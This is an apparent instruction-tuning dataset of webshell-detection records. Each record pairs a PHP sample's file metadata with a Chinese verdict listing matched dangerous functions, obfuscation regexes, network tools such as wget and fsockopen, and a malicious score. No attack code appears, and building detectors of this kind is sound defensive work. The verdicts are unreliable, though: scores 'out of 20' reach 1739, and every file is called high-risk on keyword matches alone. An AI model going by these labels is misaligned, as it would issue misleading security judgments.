{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5b244bb3b43681597a407f9ea1b5731b.php\", \"文件类型\": \"php\", \"文件大小\": \"31097 bytes\", \"行数\": 266}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/5b244bb3b43681597a407f9ea1b5731b.php", "malicious_score": 15, "md5_hash": "0421445303cfd0ec6bc20b3846e30ff0"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"f2f8e427758f06ce564ef14cfa78a71c.php\", \"文件类型\": \"php\", \"文件大小\": \"17659 bytes\", \"行数\": 419}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/f2f8e427758f06ce564ef14cfa78a71c.php", "malicious_score": 37, "md5_hash": "5937b131b67d8e0afdbd589251a5e176"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2008.php\", \"文件类型\": \"php\", \"文件大小\": \"66983 bytes\", \"行数\": 1990}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_COOKIE[, fputs(, exec(, system( 发现混淆技术: base64_decode, pack\\s*\\(, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 74/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/2008.php", "malicious_score": 74, "md5_hash": "f8e5076e734f30b8b30ef0e933a85498"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"3c819f87d0406519ee0175600e82f91b.php\", \"文件类型\": \"php\", \"文件大小\": \"25172 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/3c819f87d0406519ee0175600e82f91b.php", "malicious_score": 8, "md5_hash": "4241ed910406403266ae572d4da9014a"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c4141bf9822e843190f3941d5017feb3.php\", \"文件类型\": \"php\", \"文件大小\": \"86919 bytes\", \"行数\": 1413}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, evaL(, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 988/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/c4141bf9822e843190f3941d5017feb3.php", "malicious_score": 988, "md5_hash": "ab230817bcc99acb9bdc0ec6d264d76f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"backdoor1.php\", \"文件类型\": \"php\", \"文件大小\": \"5765 bytes\", \"行数\": 181}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fwrite(, fputs(, system(, $_POST[ 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 47/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/backdoor1.php", "malicious_score": 47, "md5_hash": "e1025af8f7550461e642029741e89c83"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c2007.php\", \"文件类型\": \"php\", \"文件大小\": \"164317 bytes\", \"行数\": 3299}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 320/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/c2007.php", "malicious_score": 320, "md5_hash": "ea2afbcb7444c6572f7b3634dd3cfb71"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a3f30c00eec6e4a5e7d14fd2a83aa225.php\", \"文件类型\": \"php\", \"文件大小\": \"90788 bytes\", \"行数\": 1915}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 505/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/a3f30c00eec6e4a5e7d14fd2a83aa225.php", "malicious_score": 505, "md5_hash": "5931a716711cbd98ca0c24e7e64c05b0"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"98f0efde7d112bea4ef1012d880efd03.php\", \"文件类型\": \"php\", \"文件大小\": \"65013 bytes\", \"行数\": 1284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_POST[ 发现混淆技术: base64_decode, pack\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 824/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/98f0efde7d112bea4ef1012d880efd03.php", "malicious_score": 824, "md5_hash": "7164b2dee5d439bc75eacc95e2a17083"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"d30d4089cf250b55e1bf50b25557c214.php\", \"文件类型\": \"php\", \"文件大小\": \"159167 bytes\", \"行数\": 3076}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 260/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/d30d4089cf250b55e1bf50b25557c214.php", "malicious_score": 260, "md5_hash": "ea512d2141cee9471fb02e22b2e16074"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"chat.php\", \"文件类型\": \"php\", \"文件大小\": \"1858 bytes\", \"行数\": 41}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/chat.php", "malicious_score": 8, "md5_hash": "0be750b2f6f5c28a50d264bcf95c0e27"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ffa9d213659f6ecce35617dee1fc8517.php\", \"文件类型\": \"php\", \"文件大小\": \"66160 bytes\", \"行数\": 1523}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_POST[, exec(, system( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 824/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ffa9d213659f6ecce35617dee1fc8517.php", "malicious_score": 824, "md5_hash": "d48794f15b8fd603a42ea328838c578a"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fb50a1637e7add60d78b7f6205e3f14f.php\", \"文件类型\": \"php\", \"文件大小\": \"41885 bytes\", \"行数\": 603}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, base64_decode (, file_get_contents(, $_GET[, system ( 发现混淆技术: base64_decode 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 527/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/fb50a1637e7add60d78b7f6205e3f14f.php", "malicious_score": 527, "md5_hash": "be2f5ec8de605eb19349ef2bd869908f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"9dc815f54b5369d281a89f2ed7a52bc7.php\", \"文件类型\": \"php\", \"文件大小\": \"390316 bytes\", \"行数\": 1632}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, exec( 发现混淆技术: unpack\\s*\\(, base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 1739/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/9dc815f54b5369d281a89f2ed7a52bc7.php", "malicious_score": 1739, "md5_hash": "1fb32f8e58c8deb168c06297a04a21f1"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"891ffdf080a3ad3b526d9ad5264efac4.php\", \"文件类型\": \"php\", \"文件大小\": \"38230 bytes\", \"行数\": 2026}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, fwrite(, system(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/891ffdf080a3ad3b526d9ad5264efac4.php", "malicious_score": 17, "md5_hash": "e24cbf0e294da9ac2117dc660d890bb9"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"STNC.php\", \"文件类型\": \"php\", \"文件大小\": \"6729 bytes\", \"行数\": 168}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs(, exec(, $_POST[, system(, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\( 恶意度评分: 80/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/STNC.php", "malicious_score": 80, "md5_hash": "2e56cfd5b5014cbbf1c1e3f082531815"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r577.php\", \"文件类型\": \"php\", \"文件大小\": \"86594 bytes\", \"行数\": 1889}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1058/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/r577.php", "malicious_score": 1058, "md5_hash": "0714f80f35c1fddef1f8938b8d42a4c8"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"7394316867fbf40088309b5150e77721.php\", \"文件类型\": \"php\", \"文件大小\": \"222039 bytes\", \"行数\": 4535}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, fwrite(, $_COOKIE[, exec(, system( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 64/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/7394316867fbf40088309b5150e77721.php", "malicious_score": 64, "md5_hash": "48ca18a25424a0f52276290b619a7a83"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ad.php\", \"文件类型\": \"php\", \"文件大小\": \"1313 bytes\", \"行数\": 51}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ad.php", "malicious_score": 6, "md5_hash": "bc170a68ff7cb4a05a334be717b50736"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"464e063abdb08464afbceff738717978.php\", \"文件类型\": \"php\", \"文件大小\": \"79452 bytes\", \"行数\": 1612}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, gzinflate(, file_get_contents(, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 688/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/464e063abdb08464afbceff738717978.php", "malicious_score": 688, "md5_hash": "aa328ed1476f4a10c0bcc2dde4461789"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2675c799c9866e6a1e2bc344af96a1a5.php\", \"文件类型\": \"php\", \"文件大小\": \"21574 bytes\", \"行数\": 567}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_COOKIE[, $_POST[, exec(, system( 发现混淆技术: base64_decode, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 198/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/2675c799c9866e6a1e2bc344af96a1a5.php", "malicious_score": 198, "md5_hash": "1bd6d6835296305ab21cd1ec34ab8627"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99madshell_v2.php\", \"文件类型\": \"php\", \"文件大小\": \"141242 bytes\", \"行数\": 2517}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 419/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/c99madshell_v2.php", "malicious_score": 419, "md5_hash": "d9e1a24f7b7cd91bc3aedddbe7f68b1f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fuckphpshell.php\", \"文件类型\": \"php\", \"文件大小\": \"9478 bytes\", \"行数\": 322}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[, shell_exec(, exec( 发现混淆技术: ord\\s*\\( 恶意度评分: 95/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/fuckphpshell.php", "malicious_score": 95, "md5_hash": "554e50c1265bb0934fcc8247ec3b9052"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2daf4ecb406f88eb63fde3a5997c3063.php\", \"文件类型\": \"php\", \"文件大小\": \"23327 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/2daf4ecb406f88eb63fde3a5997c3063.php", "malicious_score": 13, "md5_hash": "a89a639b05fb210af6e2b0914cc1a8d2"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c239c63806f184e0759b3f0dcdd103e1.php\", \"文件类型\": \"php\", \"文件大小\": \"63057 bytes\", \"行数\": 1469}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 737/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/c239c63806f184e0759b3f0dcdd103e1.php", "malicious_score": 737, "md5_hash": "0176c418103fe6acff9b0845429abb52"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ngh.php\", \"文件类型\": \"php\", \"文件大小\": \"17887 bytes\", \"行数\": 462}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ngh.php", "malicious_score": 124, "md5_hash": "ddc515f35d9c8cbfdbed0d80346ef837"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"0e83217effdeb1f2e658bc2072c6f3c0.php\", \"文件类型\": \"php\", \"文件大小\": \"111446 bytes\", \"行数\": 2111}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 1542/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/0e83217effdeb1f2e658bc2072c6f3c0.php", "malicious_score": 1542, "md5_hash": "31011382e8e1f9d032af73c6222dc3bb"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Fatalshell.php\", \"文件类型\": \"php\", \"文件大小\": \"16375 bytes\", \"行数\": 283}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, eval( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 133/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/Fatalshell.php", "malicious_score": 133, "md5_hash": "cd2c7e1c01e189d8cb3cdfd326a7ecbb"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a48296ad11ed041e4db9991af1057fb6.php\", \"文件类型\": \"php\", \"文件大小\": \"56135 bytes\", \"行数\": 1127}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 188/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/a48296ad11ed041e4db9991af1057fb6.php", "malicious_score": 188, "md5_hash": "4d57acd9e25afa0d3d66e8c7f6f5f499"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"167d76015a2fefe319053fa7eb751795.php\", \"文件类型\": \"php\", \"文件大小\": \"5733 bytes\", \"行数\": 91}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_GET[ 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/167d76015a2fefe319053fa7eb751795.php", "malicious_score": 15, "md5_hash": "e7da273cee2d5b0ab14a847b87e3adb0"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"938605488102e4a11e999c48499aff0f.php\", \"文件类型\": \"php\", \"文件大小\": \"152950 bytes\", \"行数\": 2927}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, fwrite(, $_COOKIE[, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 176/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/938605488102e4a11e999c48499aff0f.php", "malicious_score": 176, "md5_hash": "ed3d75da61ae823e29c641bf77863e52"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHVayv.php\", \"文件类型\": \"php\", \"文件大小\": \"24678 bytes\", \"行数\": 597}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/PHVayv.php", "malicious_score": 10, "md5_hash": "ed360ac55c5ac7312a61170e53c6e35d"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wordpress_malicious_code_added_to_functions.php.php\", \"文件类型\": \"php\", \"文件大小\": \"4184 bytes\", \"行数\": 99}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 72/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/wordpress_malicious_code_added_to_functions.php.php", "malicious_score": 72, "md5_hash": "9d7f5488708d89f6c83b1fd8a021bf1c"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"0dddcf2a441c3053deabcb9ce618457c.php\", \"文件类型\": \"php\", \"文件大小\": \"18370 bytes\", \"行数\": 588}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, $_COOKIE[, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 221/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/0dddcf2a441c3053deabcb9ce618457c.php", "malicious_score": 221, "md5_hash": "8bfa2eeb8a3ff6afc619258e39fded56"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2a0b3f05d6613326e2f77efda8bd7c9d.php\", \"文件类型\": \"php\", \"文件大小\": \"4656 bytes\", \"行数\": 229}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, fputs(, eval(, passthru( 发现混淆技术: base64_decode 包含网络功能: fsockopen 具备文件操作能力: copy\\s*\\( 恶意度评分: 82/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/2a0b3f05d6613326e2f77efda8bd7c9d.php", "malicious_score": 82, "md5_hash": "3529a116017ece53288e66e96e6a4892"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"83c5a907b9f63d12c37b820e6ec5d973.php\", \"文件类型\": \"php\", \"文件大小\": \"5121 bytes\", \"行数\": 141}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 具备文件操作能力: copy\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/83c5a907b9f63d12c37b820e6ec5d973.php", "malicious_score": 7, "md5_hash": "9136a2b2603d1f2a3daeba521537ae05"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2c09e48ee954dd7a4156606bad83fd63.php\", \"文件类型\": \"php\", \"文件大小\": \"34715 bytes\", \"行数\": 21}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/2c09e48ee954dd7a4156606bad83fd63.php", "malicious_score": 13, "md5_hash": "719ce37133c4a4637d33f59d56175cab"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"91bd947d21df1c3755901eba0d3bfe7f.php\", \"文件类型\": \"php\", \"文件大小\": \"31801 bytes\", \"行数\": 730}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, exec(, eval(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: wget, urllib 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 278/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/91bd947d21df1c3755901eba0d3bfe7f.php", "malicious_score": 278, "md5_hash": "35ad2533192fe8a1a76c3276140db820"}}
